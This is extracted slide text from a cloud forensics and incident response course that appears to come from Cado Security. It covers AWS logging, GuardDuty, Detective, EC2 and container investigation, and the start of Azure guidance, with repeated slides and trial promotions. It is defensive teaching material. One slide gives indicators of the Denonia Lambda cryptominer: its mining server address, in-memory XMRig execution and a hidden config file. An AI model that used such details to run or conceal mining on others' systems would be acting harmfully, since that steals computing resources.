The document provides an overview of a free training program from Cado Security that covers cloud forensics and incident response fundamentals for AWS, Azure, and GCP, including topics such as digital forensics principles, investigative models, incident response planning, gathering an incident response team, running investigations, and containment and remediation. It also promotes Cado Security's incident response platform for investigating incidents at cloud speed.
6. What is Volatile Data?
Two basic types of data are collected in computer forensics:
● Persistent data: Data stored on a local hard drive (or another medium) and is preserved
when the computer is turned off.
● Volatile data: Data that is stored in memory, or exists in transit, that will be lost when the
computer loses power or is turned off. Volatile data resides in registries, cache, and random
access memory (RAM). The investigation of this volatile data is called “live forensics”.
https://athenaforensics.co.uk/what-is-volatile-data/
7. What is…
● Disk Forensics
● Memory Forensics
● Network Forensics
11. Incident Response Planning - Be Prepared!
● Periodically run tabletop exercises to simulate incidents and build muscle memory across both executive and
operational teams
● Executives should be prepared to answer the following questions:
● Under what circumstances do you notify law enforcement, regulatory authorities, auditors and the
board?
● Will your organization pay a ransom? If so, how?
● If required, which outsourced incident response firm will you work with?
● If you lose access to core IT systems for an extended period of time? Do you have business continuity
and disaster recovery plans in place?
● If the primary communication methods are either unavailable or compromised, do you have backup or
out-of-band communications available?
● What working hours are incident responders expected to work in a high-severity incident?
● Do you have access to the data required to perform an investigation in all products and services?
12. Gather the Incident Response Team
The roles in an incident response team will vary depending on both the size of your team and the scale of the
incident. Most often, one person will take on a number of roles. A typical example of the roles in an incident
response team is:
● Leadership role - Commands the investigation and directs activities.
● Investigator role - Identifies incident root cause and the full scope of compromised systems and
data.
● Responder role - Works with internal teams and 3rd parties to recover and restore systems and
services and plan and coordinate remediation steps.
● Documentation role - Enables the investigation, remediation and potentially legal representation.
The legal representation may also be handled by inside or outside counsel (though only a small
number of incidents end up bringing in a legal representative).
13. Running an Investigation
First, identify the scope of the investigation by answering the following questions:
● Do you just need to recover services?
● Do you need to identify the root cause of the incident so it doesn’t happen again?
Most investigations start with a suspicious event - such as a detection for malware on a system. And then the
investigation progresses as you pivot based on timestamps or key findings and artifacts. For example:
● What other events happened just before or after the known bad event?
● Are there other suspect files in the same folder?
● Are other systems connected to known bad events or known compromised systems somehow?
Below we provide suggested investigative steps based on the Azure service involved, the type of incident, and
recommendations on tools that may be useful.
14. Containment & Remediation
During the containment phase of an incident, some questions that will be important to answer include:
● Can you limit the damage before it gets worse?
● Do you need to isolate virtual machines or services?
● Can you permanently bring the environment back to a safe state?
● If you have identified the root cause, can you fix the original issue? If not, can you mitigate the risk
with other preventative technology or additional monitoring to identify future use?
● Have you hunted for other potential compromises? For example, by importing key systems and
scanning for malware.
● Have you reviewed the best practices above and confirmed if any need to be implemented?
● Have you enabled additional monitoring where gaps have been identified?
● Have you documented all findings and actions taken?
● Do you need to publish an incident report?
● Have you identified lessons learned and conducted a wrap-up meeting?
15. Cado Platform
Free 14-day trial
Receive unlimited access to
the Cado Platform for 14 days.
www.cadosecurity.com/free-investigation/
18. What is IaaS vs…? Hows is IR different?
Graphic from “IaaS vs. PaaS vs. SaaS” by RedHat
19. What is Shared Responsibility? What happens in IR?
Graphic from “Shared Responsibility Model” by AWS
20. What is Shared Fate?
Graphic from “Shared Responsibility Model” by AWS
21. What is Identity and Access Management (IAM)?
How does it impact IR? Access, Logs, Attacker Access…
22. What is Virtual Private Cloud (VPC)? How can an attacker
move?
23. What are Common Attacks in the Cloud?
● Misconfiguration
● Stolen Credentials - Where do you find them?
● Phishing - Recent examples
● Poisoned Gold Image or Library
● S3…
24. How else might you know you have a problem?
● An email from AWS...
● Weird IAM
● Sudden increase in billing
● High CPU Usage...
Graphic from “Cloud Security: Defense in Detail if Not in Depth” by SANS
34. What are…
Cloud security incident domains?
From/See “AWS Security Incident Response Guide”
https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/introdu
ction.html
Service domain – Incidents in the service domain might affect your
AWS account, AWS Identity and Access Management (IAM)
permissions, resource metadata, billing, or other areas. A service
domain event is one that you respond to exclusively with AWS API
mechanisms, or where you have root causes associated with your
configuration or resource permissions, and might have related
service-oriented logging.
Infrastructure domain – Incidents in the infrastructure domain
include data or network-related activity, such as processes and data
on your Amazon Elastic Compute Cloud (Amazon EC2) instances…
Application domain – Incidents in the application domain occur in
the application code or in software deployed to the services or
infrastructure…
35. What is AWS IAM?
https://blog.gitguardian.com/aws-iam-security-best-practices/
AWS Identity and Access Management (IAM) is a
web service that helps you securely control
access to AWS resources.
With IAM, you can centrally manage permissions
that control which AWS resources users can
access.
You use IAM to control who is authenticated
(signed in) and authorized (has permissions) to
use resources.
36. What is the IAM workflow?
https://docs.aws.amazon.com/IAM/latest/UserGuide/intro-structure.html
https://nodramadevops.com/2019/11/why-is-aws-iam-so-hard/
The IAM workflow includes the following six elements:
- A principal is an entity that can perform actions on an AWS
resource. A user, a role or an application can be a principal.
- Authentication is the process of confirming the identity of the
principal trying to access an AWS product.
- Authorization is the process of granting or denying access to
AWS resources.
- Policies are documents that define permissions for a principal.
- A resource is an AWS entity that the principal can access.
- A request is an attempt to access an AWS resource
37. What are Policies?
In AWS Identity and Access Management (IAM),
policies are used to define permissions for an action
regardless of the method that you use to perform the
operation. There are six types of policies that AWS
supports: identity-based policies, resource-based
policies, permissions boundaries, Organizations SCPs,
ACLs, and session policies.
Identity-based policies are the most common type of
policy and are attached to an IAM identity (user, group,
or role) or an AWS account. Resource-based policies
are attached to a resource, such as an Amazon S3
bucket or an Amazon SQS queue.
You can create your own policies or use AWS managed
policies. AWS managed policies are created and
managed by AWS, whereas customer managed policies
are created and managed by you.
38. How does IAM Work?
From “AWS Identity and Access Management (IAM) deep dive” by Becky Weiss @ AWS
Great talk!
39. What is Identity Federation?
“How to Establish Federated Access to Your AWS Resources by Using Active Directory User Attributes” - AWS.com
“If you already manage user identities outside of AWS, you can use IAM identity providers instead of creating IAM
users in your AWS account. With an identity provider (IdP), you can manage your user identities outside of AWS and
give these external user identities permissions to use AWS resources in your account. This is useful if your
organization already has its own identity system, such as a corporate user directory.”
40. What AWS IAM Logging is there?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
Also check-out the policy simulator
AWS CloudTrail captures all API calls for IAM and AWS STS as events, including
calls from the console and API calls.
AWS Identity and Access Management Access Analyzer helps you identify the
resources in your organization and accounts, such as Amazon S3 buckets or IAM
roles, that are shared with an external entity. This helps you identify unintended
access to your resources and data, which is a security risk.
41. How do I block access in AWS IAM?
See “Identity & Access Management” in AWS Well-Architected Labs
https://www.wellarchitectedlabs.com/security/300_labs/300_incident_response_with_aws_console_and_cli/2_iam/
See “Incident_Response_Playbook_AWS_IAM” Jupyter Notebook for how to investigate IAM/CloudTrail
45. What Incidents might you
see in AWS?
See “AWS Incident Response in your Pyjamas” (great talk!) by Paco Hope @ AWS
https://owasp.org/www-chapter-london/assets/slides/OWASPLondon-IR-In-Your-Pyjamas-Paco-Hope-20190
213-PDF.pdf
46. What are… Cloud security incident domains?
From/See “AWS Security Incident Response Guide”
https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/introduction.html
Service domain – Incidents in the service domain might affect your AWS account, AWS Identity and Access
Management (IAM) permissions, resource metadata, billing, or other areas.
A service domain event is one that you respond to exclusively with AWS API mechanisms, or where you have
root causes associated with your configuration or resource permissions, and might have related
service-oriented logging.
Infrastructure domain – Incidents in the infrastructure domain include data or network-related activity, such
as processes and data on your Amazon Elastic Compute Cloud (Amazon EC2) instances…
Application domain – Incidents in the application domain occur in the application code or in software
deployed to the services or infrastructure…
47. What are Common Attacks in the Cloud?
● Misconfiguration
● Stolen Credentials - Where do you find them?
● Phishing - Recent examples
● Poisoned Gold Image or Library
● S3…
48. How else might you know you have a problem?
● An email from AWS...
● Weird IAM
● Sudden increase in billing
● High CPU Usage...
Graphic from “Cloud Security: Defense in Detail if Not in Depth” by SANS
49. What is Shared Responsibility? What happens in IR?
Graphic from “Shared Responsibility Model” by AWS
50. Why is responding to incidents in the cloud hard?
Graphic from “Cloud Security: Defense in Detail if Not in Depth” by SANS
51. Steps to Responding in AWS
When you are investigating a compromise of a cloud environment, there are a few key steps that you should follow:
1. Identify the scope of the incident: The first step is to identify the scope of the incident. This means determining which
resources were affected and how the data was accessed.
2. Collect evidence: The next step is to collect evidence. This includes collecting log files, network traffic, metadata, and
configuration files.
3. Analyze the evidence: The next step is to analyze the evidence. This means looking for signs of malicious activity and
determining how the data was compromised.
4. Respond to the incident and contain it: The next step is to respond to the incident. This means taking steps to mitigate the
damage and prevent future incidents. For example with a compromise of an EC2 system in AWS, that may include turning off the
system or updating the firewall to block all network traffic, as well as isolating any associated IAM roles by adding a DenyAll
policy. Once the incident is contained, that will give you more time to investigate safely in detail.
5. Document the incident: The final step is to document the incident. This includes creating a report that describes the incident,
the steps that were taken to respond to the incident, and the lessons that were learned.
52. What data do you have in AWS
Getting access to the data required to perform an investigation to find the root cause is often harder in the cloud than it is on-prem.
That’s as you often find yourself at the mercy of the data the cloud providers have decided to let you access. That said, there are a
number of different resources that can be used for cloud forensics, including:
● AWS EC2: Data you can get includes snapshots of the volumes and memory dumps of the live systems. You can also get
cloudtrail logs associated with the instance.
● AWS EKS: Data you can get includes audit logs and control plane logs in S3. You can also get the docker file system, which is
normally a versioned filesystem called overlay2. You can also get the docker logs from containers that have been started and
stopped.
● AWS ECS: You can use ecs execute or kubectl exec to grab files from the filesystem and memory.
● AWS Lambda: You can get cloud trail logs and previous versions of lambda.
53. What logging is in AWS? Where do you look?
https://cloudstudio.com.au/2022/05/14/monitoring-service-aws-azure-gcp-part1/
54. What is AWS IAM?
https://blog.gitguardian.com/aws-iam-security-best-practices/
AWS Identity and Access Management (IAM) is a
web service that helps you securely control
access to AWS resources.
With IAM, you can centrally manage permissions
that control which AWS resources users can
access.
You use IAM to control who is authenticated
(signed in) and authorized (has permissions) to
use resources.
55. What AWS IAM Logging is there?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
Also check-out the policy simulator
AWS CloudTrail captures all API calls for IAM and AWS STS as events, including
calls from the console and API calls.
AWS Identity and Access Management Access Analyzer helps you identify the
resources in your organization and accounts, such as Amazon S3 buckets or IAM
roles, that are shared with an external entity. This helps you identify unintended
access to your resources and data, which is a security risk.
56. How do I block access in AWS IAM?
See “Identity & Access Management” in AWS Well-Architected Labs
https://www.wellarchitectedlabs.com/security/300_labs/300_incident_response_with_aws_console_and_cli/2_iam/
See “Incident_Response_Playbook_AWS_IAM” Jupyter Notebook for how to investigate IAM/CloudTrail
57. How do you respond to a compromised EC2?
If you’ve identified a potentially compromised EC2 instance -
There are a number of immediate actions you can take:
● To limit the possibility of data theft, change the security group to one that doesn’t allow any
outbound internet access.
● Identify if there was an Instance Profile attached to the EC2. If there was, check CloudTrail logs
to see if it may have been abused to access other resources in AWS.
● Take a snapshot of the EC2, to enable forensic analysis later on.
58. What is Virtual Private Cloud (VPC)? How can an attacker
move?
59. How do you perform EC2 Isolation?
See “AWS Incident Response in your Pyjamas” (great talk!) by Paco Hope @ AWS
60. Automated Incident Response
and Forensics Framework
https://github.com/awslabs/aws-automated-incident-response-and-forensics/
61. CloudTrail Logs
● Shows: API Level Calls
● Usefulness: Low
● Collected by: S3
Amazon S3
Container Investigation Data Sources in AWS
EKS Audit / Control Plane Logs
● Shows: API Level Calls
● Usefulness: Medium
● Collected by: S3
Amazon EC2 - Hosting EKS/ECS Inside Container - EKS/ECS on Fargate/EC2
Docker Logs
● Logs what containers were started, stopped
● Usefulness: Medium
● Collected by: EC2 Import or Cado Host
Docker Container Filesystems
● Normally overlay2 versioned filesystem
● Contains all the files from all the containers
● Usefulness: High
● Collected by: EC2 EBS (API) or Cado Host (SSM/SSH)
Container Filesystems
● Live filesystem as seen by the container, Memory
● Contains all the files from all the containers
● Usefulness: Very High
● Collected by: Cado Host (ECS Exec/kubectl exec))
66. Automating Response
Guarduty
Detection Positive
Analyst
Reviews Alert
Snapshots
System
Retrieves
Snapshots for
Analysis
Process and
Investigate
Snapshot
Isolate System
Without Cado
8+ Hours and Manual
To manually respond and resolve the incident
Guarduty
Detection
Isolate System
With Cado //
Minutes and Automated
To automatically respond and resolve the incident
Positive
Minutes
// Cado Automation
67. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
71. Unauthorized IAM Credential Use - Simulation and Detection
During this workshop, you will simulate the unauthorized use of IAM credentials using a script invoked within AWS
CloudShell. The script will perform reconnaissance and privilege escalation activities that have been commonly seen
by the AWS CIRT (Customer Incident Response Team) and are typically performed during similar events of this nature.
You will then be introduced to some of the tools and processes that the AWS CIRT use, and learn how to use these
tools to find evidence of unauthorized activity.
Ransomware on S3 - Simulation and Detection
During this workshop, you will use a CloudFormation template to replicate an environment with multiple IAM users and
five (5) Amazon S3 buckets. AWS CloudShell will then be used to run a bash script that will simulate data exfiltration
and data deletion events that replicate a ransomware based security event. You will then be introduced to some of the
tools and processes that the AWS CIRT (Customer Incident Response Team) team use in response to similar events,
and learn how to use these tools to find evidence of unauthorized activity.
Cryptominer Based Security Events - Simulation and Detection
During this workshop, you will simulate a cryptomining security event by using a CloudFormation template to initialize
five EC2 instances. These five EC2 instances will mimic cryptomining activity by performing DNS requests to known
cryptomining domains. You will then be introduced to some of the tools and processes that the AWS CIRT (Customer
Incident Response Team) use in response to similar events, and learn how to use these tools to find evidence of
unauthorized activity.
72. SSRF on IMDSv1 - Simulation and Detection
During this workshop, you will simulate the unauthorized use of a web application that is hosted on an AWS
EC2 instance configured to use IMDSv1 (Instance Metadata Service Version 1) and is vulnerable to SSRF
(Server Side Request Forgery). You will then walk through some of the detection activities that the AWS CIRT
(Customer Incident Response Team) perform when responding to security events of this nature.
AWS CIRT Toolkit For Incident Response Preparedness
During this workshop, you will install and experiment with some common tools and utilities that the AWS CIRT
(Customer Incident Response Team) use on a daily basis. The AWS CIRT uses these tools to detect security
misconfigurations, respond to active events, and assist customers with protecting their infrastructure.
(Mostly Athena…)
73. Threat Detection and Response with Amazon GuardDuty and Amazon Detective
https://catalog.workshops.aws/guardduty/en-US/0-workshop-introduction#threat-detection-and-response-scenarios
74. Well Architected Labs: Incident Response
https://www.wellarchitectedlabs.com/security/quests/quest_200_incident_response_day/
(Official AWS Site)
83. What is Cloud Trail?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
AWS CloudTrail AWS CloudTrail is a service that enables you to log, continuously monitor, and retain account
activity related to actions across your AWS infrastructure.
You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event
occurred, and other details to help you analyze and respond to activity in your AWS account.
86. What is CloudWatch?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
Amazon CloudWatch monitors your AWS resources and the applications that you
run on AWS in real time. You can collect and track metrics, create customized
dashboards, and set alarms that notify you or take actions when a specified metric
reaches a threshold that you specify. For example, you can have CloudWatch track
CPU usage or other metrics of your Amazon EC2 instances and automatically
launch new instances when needed.
Amazon CloudWatch Logs helps you monitor, store, and access your log files
from Amazon EC2 instances, CloudTrail, and other sources. CloudWatch Logs can
monitor information in the log files and notify you when certain thresholds are met.
You can also archive your log data in highly durable storage.
87. CloudWatch vs CloudTrail?
CloudWatch CloudTrail
Performance Monitoring Auditing
Log events across AWS Services
- operations
Log API activity across AWS
Services - Activities
Higher Level Monitoring Lower Level Granular Data
88. Lambda Logging in CloudWatch
https://docs.aws.amazon.com/lambda/latest/operatorguide/log-structure.html
89. Lambda Logging in CloudWatch
https://docs.aws.amazon.com/lambda/latest/operatorguide/parse-logs.html
90. Collecting operating system logs with Cloudwatch agent
https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Install-CloudWatch-Agent.html
91. So Many Logs, So Little Standards?
See “AWS Logging Types”
https://bit.ly/3XidVm3
102. What is GuardDuty?
https://aws.amazon.com/guardduty/
Amazon GuardDuty is a threat detection service that continuously monitors
your AWS accounts and workloads for malicious activity and delivers
detailed security findings for visibility and remediation. GuardDuty uses
machine learning, anomaly detection, and threat intelligence to identify and
prioritize potential threats.
GuardDuty can detect a wide range of threats, including:
● Compromised accounts
● Anomalous behavior
● Malware
● Data exfiltration
● Infrastructure changes
● Network intrusions
103. How does EBS scanning work?
https://aws.amazon.com/guardduty/
104. What are common GuardDuty Detections?
https://docs.aws.amazon.com/guardduty/latest/ug/logging-using-cloudtrail.html
AWS CloudTrail Management events that GuardDuty monitors:
- Configuring security (IAM AttachRolePolicyAPI operations); - Configuring rules for routing data (Amazon EC2 CreateSubnet API operations); -
Setting up logging (AWS CloudTrail CreateTrail API operations)
AWS CloudTrail data events that GuardDuty monitors:
Data events, also known as data plane operations, provide insight into the resource operations performed on or within a resource. They are often
high-volume activities. E.g.
- GetObject API operations; - PutObject API operations; - ListObjects API operations; - DeleteObject API operations
Kubernetes audit logs
Amazon EKS allows Kubernetes audit logs to be ingested as Amazon CloudWatch Logs through the EKS control plane logging feature.
VPC Flow Logs
The VPC Flow Logs feature of Amazon VPC captures information about the IP traffic going to and from network interfaces within your environment.
When you enable GuardDuty, it immediately starts analyzing your VPC flow logs data.
DNS logs
If you use AWS DNS resolvers for your Amazon EC2 instances (the default setting), then GuardDuty can access and process your request and
response DNS logs through the internal AWS DNS resolvers.
Elastic Block Storage (EBS) volume
GuardDuty Malware Protection scans and detects malware on Amazon EBS volumes attached to your Amazon EC2 instances.
RDS login activity monitoring
RDS login activity captures both successful and failed login attempts made to the Supported Amazon Aurora databases in your AWS environment.
105. What are common GuardDuty Findings?
https://aws.amazon.com/blogs/aws/new-using-amazon-guardduty-to-protect-your-s3-buckets/
106. What Threat Intelligence is in Guard Duty?
https://maturitymodel.security.aws.dev/en/4.-optimized/threat-intellingence/
107. Where does GuardDuty log?
https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_exportfindings.html
GuardDuty supports exporting active findings to CloudWatch Events and, optionally, to an Amazon S3 bucket.
New Active findings that GuardDuty generates are automatically exported within about 5 minutes after the finding is generated.
You can set the frequency for how often updates to Active findings are exported to CloudWatch Events.
The frequency that you select applies to the exporting of new occurrences of existing findings to CloudWatch Events, your S3
bucket (if configured), and Detective (if integrated).
108. Where does GuardDuty log?
Amazon GuardDuty can export findings to an Amazon S3 bucket or CloudWatch.
To export findings to an Amazon S3 bucket:
1. Go to the Amazon GuardDuty console.
2. In the navigation pane, choose Settings.
3. Under Findings export options, choose Configure now.
4. For S3 bucket, choose Existing bucket and select the bucket that you want to use.
5. For Log file prefix, enter a prefix for the log files.
6. Choose Save.
To export findings to a CloudWatch Logs log group:
1. Go to the Amazon GuardDuty console.
2. In the navigation pane, choose Settings.
3. Under Findings export options, choose Configure now.
4. For CloudWatch Logs log group, choose Existing log group and select the log group that
you want to use.
5. Choose Save.
Once you have configured findings export, GuardDuty will begin exporting findings to the destination
that you selected.
113. What is AWS Detective?
Amazon Detective is a security service that helps you investigate security incidents
across multiple AWS accounts. Detective automatically collects and stores security
telemetry from your AWS accounts, including CloudTrail logs, VPC Flow Logs, and
GuardDuty findings. It then uses machine learning to identify anomalous behavior and to
build a security behavior graph that represents the interactions between your AWS
resources.
Detective can help you to:
● Quickly identify the root cause of security incidents
● Investigate security incidents across multiple AWS accounts
● Get a comprehensive view of your security posture
● Remediate security incidents more quickly
Detective is a powerful tool that can help you to improve your security posture and to
protect your AWS environment from threats.
114. What are Example Use Cases?
https://pages.awscloud.com/rs/112-TZM-766/images/2020_0122-SID_Slide-Deck.pdf
115. What are Investigation Playbooks?
https://maturitymodel.security.aws.dev/en/4.-optimized/detective/
116. How do you Search?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
117. How do you review a Guard Duty Finding?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
118. How do you review Connections?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
119. How do you analyze detailed VPC Flow Logs?
https://aws.amazon.com/blogs/security/investigate-vpc-flow-with-amazon-detective/
120. How do you use GeoIP?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
121. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
123. What is AWS Security Hub?
https://aws.amazon.com/security-hub/
AWS Security Hub is a centralized security management service that provides you
with a comprehensive view of your security posture across your AWS accounts. It
does this by aggregating security alerts (i.e. findings) from various AWS services and
partner products in a standardized format so that you can more easily take action on
them. Security Hub also provides you with a set of pre-defined security checks that
you can use to assess your compliance with industry standards and best practices.
It provides:
● Reduced complexity: Security Hub simplifies security management by
providing you with a single place to view and manage security alerts from
across your AWS accounts.
● Improved visibility: Security Hub provides you with a comprehensive view of
your security posture across your AWS accounts. This information can help
you to identify and remediate security vulnerabilities before they are exploited.
● Increased compliance: Security Hub can help you to meet your compliance
requirements by providing you with a centralized view of your security events.
This information can be used to demonstrate your compliance with industry
standards, such as HIPAA and PCI DSS.
124. How does the Security Hub Flow work?
https://d1.awsstatic.com/partner-network/Security-Hub-Partner-Onboarding-Deck.pdf
125. What are Security Hub Standards & Controls?
https://www.stormit.cloud/blog/aws-security-hub/
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
126. What are Findings & Insights?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
127. What Integrations are there?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
128. What Custom Actions are there?
https://aws.amazon.com/blogs/aws/aws-security-hub-now-generally-available/
129. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
131. How do you respond to a compromised EC2?
If you’ve identified a potentially compromised EC2 instance, there are a number of immediate
actions you can take:
● To limit the possibility of data theft, change the security group to one that doesn’t allow any
outbound internet access.
● Identify if there was an Instance Profile attached to the EC2. If there was,
check CloudTrail logs to see if it may have been abused to access other resources
in AWS.
● Take a snapshot of the EC2, to enable forensic analysis later on.
132. What Official AWS Resources are there?
AWS provides a number of experimental solutions to help isolate, preserve and analyze compromised EC2 systems.
A few key ones to play with include:
● “Solution for AWS Cloud for Incident Response in EC2 instances”
This is a CloudFormation deployment to quarantine EC2 systems via SSM commands on the host themselves, perform security
group changes, and snapshot EBS volumes.
● “Automated Incident Response with SSM”
Another solution that uses SSM that can also quarantine EC2 systems,
but is based on the outcome of GuardDuty events.
● “Automated Incident Response and Forensics Framework”
A set of Security Hub actions to acquire data from EC2 systems.
● “Automated Forensics Orchestrator for Amazon EC2”
A more recent CloudFormation deployment to acquire data from EC2 systems then points you to the free SANS SIFT Linux
distribution for command line analysis at the raw disk level.
● “EC2 Auto Clean Room Forensics”
A CloudFormation deployment that will run the open-source fls tool to dump
file timestamps from files found on a compromised EC2 system.
133. What other Resources are there?
Community Resources
SANS has published a Whitepaper titled “Digital
Forensic Analysis of Amazon Linux EC2
Instances”.
A number of tools were released at Blackhat 2016
for AWS.
Whilst a little dated now, there are useful tools in the
ThreatResponse Github repository for preserving
forensic artifacts from EC2 instances, as well as
isolating them and associated IAM credentials.
Cado Security Resources
We’ve published a video tutorial on how to investigate a
compromised EC2 Instance on YouTube. You can use
Cado Response to import potentially compromised EC2
systems in a single click for investigation.
However, if you’ve set up an API to drive an automated
response framework, you can automatically capture data
immediately following detection to reduce the Mean Time
to Respond (MTTR).
134. How do you perform EC2 Isolation?
https://owasp.org/www-chapter-london/assets/slides/OWASPLondon-IR-In-Your-Pyjamas-Paco-Hope-20190213-PDF.pdf
135. How can you automate the Response to EC2 GuardDuty Alerts with
Cado?
142. How do you respond to a compromised EKS Container or Node?
If you’ve identified a potentially compromised container in EKS, there are two potential ways forward:
● If the container is running on an underlying EC2, then refer to the suggested steps above for immediate actions.
● If the container is running on Fargate, then collect any data required for later analysis before subsequently
suspending it.
143. GuardDuty now supports EKS
https://aws.amazon.com/blogs/security/how-to-use-new-amazon-guardduty-eks-protection-findings/
https://medium.com/@cloud_tips/guide-to-aws-guardduty-findings-in-eks-62babbd7da88
144. GuardDuty now supports EKS
From “Enhanced threat detection for Amazon EKS with Amazon GuardDuty- AWS Online Tech Talks”
145. CloudTrail Logs
● Shows: API Level Calls
● Usefulness: Low
● Collected by: S3
Amazon S3
Container Investigation Data Sources in AWS?
EKS Audit / Control Plane Logs
● Shows: API Level Calls
● Usefulness: Medium
● Collected by: S3
Amazon EC2 - Hosting EKS/ECS Inside Container - EKS/ECS on Fargate/EC2
Docker Logs
● Logs what containers were started, stopped
● Usefulness: Medium
● Collected by: EC2 Import or Cado Host
Docker Container Filesystems
● Normally overlay2 versioned filesystem
● Contains all the files from all the containers
● Usefulness: High
● Collected by: EC2 EBS (API) or Cado Host (SSM/SSH)
Container Filesystems
● Live filesystem as seen by the container, Memory
● Contains all the files from all the containers
● Usefulness: Very High
● Collected by: Cado Host (ECS Exec/kubectl exec))
146. How do you Acquire an Amazon EKS System in Cado?
147. What is overlay2?
Overlay2 is the file system you are most likely to see.
It’s also versioned, which helps preserve evidence of attacks.
Separate containers are kept in their own folders:
148. What AWS EKS Logs are Stored in AWS?
It's important to also analyze AWS logs that are generated for EKS systems.
These contain metadata around starting and stopping containers.
Below you can see a view of AWS logs collected in Cado Response:
149. What Resources are available?
kube-forensics allows a cluster administrator to dump the current
state of a running pod and all its containers so that security
professionals can perform offline forensic analysis.
https://github.com/keikoproj/kube-forensics
We previously published a playbook dedicated to investigating compromises in
EKS environments. Check out the GitHub repository with sample data taken
from a compromised EKS system, and an associated talk on how to analyze it.
https://offers.cadosecurity.com/the-ultimate-guide-to-docker-and-kubernetes-incident-response
https://github.com/cado-security/AWS_EKS_Cluster_Forensics
https://www.brighttalk.com/webcast/19071/502974
Community
Resources
Cado Security
Resources
150. What Remediation is available?
https://aws.amazon.com/blogs/security/how-to-investigate-and-take-action-on-security-issues-in-amazon-eks-clusters-with-amazon-detective-part-2/
151. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
154. How does GuardDuty work with ECS?
https://docs.aws.amazon.com/guardduty/latest/ug/findings-malware-protection.html
155. CloudTrail Logs
● Shows: API Level Calls
● Usefulness: Low
● Collected by: S3
Amazon S3
Container Investigation Data Sources in AWS
EKS Audit / Control Plane Logs
● Shows: API Level Calls
● Usefulness: Medium
● Collected by: S3
Amazon EC2 - Hosting EKS/ECS Inside Container - EKS/ECS on Fargate/EC2
Docker Logs
● Logs what containers were started, stopped
● Usefulness: Medium
● Collected by: EC2 Import or Cado Host
Docker Container Filesystems
● Normally overlay2 versioned filesystem
● Contains all the files from all the containers
● Usefulness: High
● Collected by: EC2 EBS (API) or Cado Host (SSM/SSH)
Container Filesystems
● Live filesystem as seen by the container, Memory
● Contains all the files from all the containers
● Usefulness: Very High
● Collected by: Cado Host (ECS Exec/kubectl exec))
156. How do you Acquire an Amazon ECS System in Cado?
157. How do you Investigate an ECS Container in Cado?
https://docs.cadosecurity.com/cado-response/discovery-import/import/aws/aws-ecs
Requires enableExecuteCommand
158. How do you Remediate a compromised ECS Cluster?
https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_remediate.html#compromised-ecs
159. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
164. Denonia
“python”
DNS over HTTPs
Custom Monero server 116.203.4.0:3333
Run XMRig from memory
Writes config to hidden file at /tmp/.config.json
https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
165. How do you Acquire a Lambda function in Cado?
166. How do you analyze Lambda in Cado?
https://www.cadosecurity.com/aws-lambda-incident-response/
168. How do you use Lambda for Incident Response?
https://www.cadosecurity.com/automated-analysis-of-critical-cloud-infrastructure-with-cado-and-aws-lambda/
169. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
176. How can you prepare for an incident in Azure?
Know Your Data
Identify your crown jewels. Do you have particularly sensitive information, like Personally Identifiable Information (PII) or Payment
Card Industry (PCI) data?
If so, you need to know exactly where it lives and what systems process the data. This also includes any backups or logs that might
shadow the original data.
Have Backups, And Test They Work
A disaster recovery plan can mitigate not just security incidents like ransomware, but also other likely events such as data center
hardware failure. Ransomware is a high risk due to both high impact and relatively high likelihood of occurrence.
Restrict Administrative Accounts
In general, follow the principle of least privilege. In particular, Microsoft provides detailed advice on how to secure administrative
accounts in Azure AD.
Require Multi-Factor Authentication for all User Accounts
177. How can you prepare for an incident in Azure?
Review Azure Security Center Settings
Azure Security Center is a centralized view of both security issues and configuration options. Unfortunately, many of the most useful features need
to be enabled (at cost) in advance of any breach.
Limit Network and Remote Access
Limit any connectivity to the internet from your machines as much as possible. A common security issue in Azure is Windows machines with RDP
accessible from the internet. This can put you at particular risk of brute-force ransomware attacks.
Encryption
The general advice is to ensure data is always encrypted at rest and in transit. There are open discussions around how useful encrypting data at
rest is with some cloud services. However, you may have particular requirements here if you are in a regulated industry such as finance or
healthcare.
Enable Logging
“Forensic readiness” will help you not only detect incidents earlier but also make investigations more thorough and efficient. As you can imagine,
the more useful data you have, the more likely you will be able to find the root cause of an incident. Ensuring you have the right logs enabled can
make all the difference.
178. Understand the Environment
It is important to gain an understanding of the environment in which the incident occurred.
If you are an internal SOC, you may already know the answers to these questions in advance of an incident:
● Where is sensitive data stored?
● How are users connected to Azure Active Directory?
● Who are the administrators?
● Where are logs stored?
● What Azure Products and Services are in use?
● Is Active Directory connected to On-Premise or Microsoft 365?
179. Investigating Active Directory
Azure Active Directory (Azure AD) is Microsoft’s cloud-based identity and access management service. It combines core
directory services, application access management, and identity protection into a single solution. It enables single sign-on and
multi-factor authentication to help protect users from password fatigue and phishing attacks. It also provides group
management and device management capabilities.
When responding to an incident:
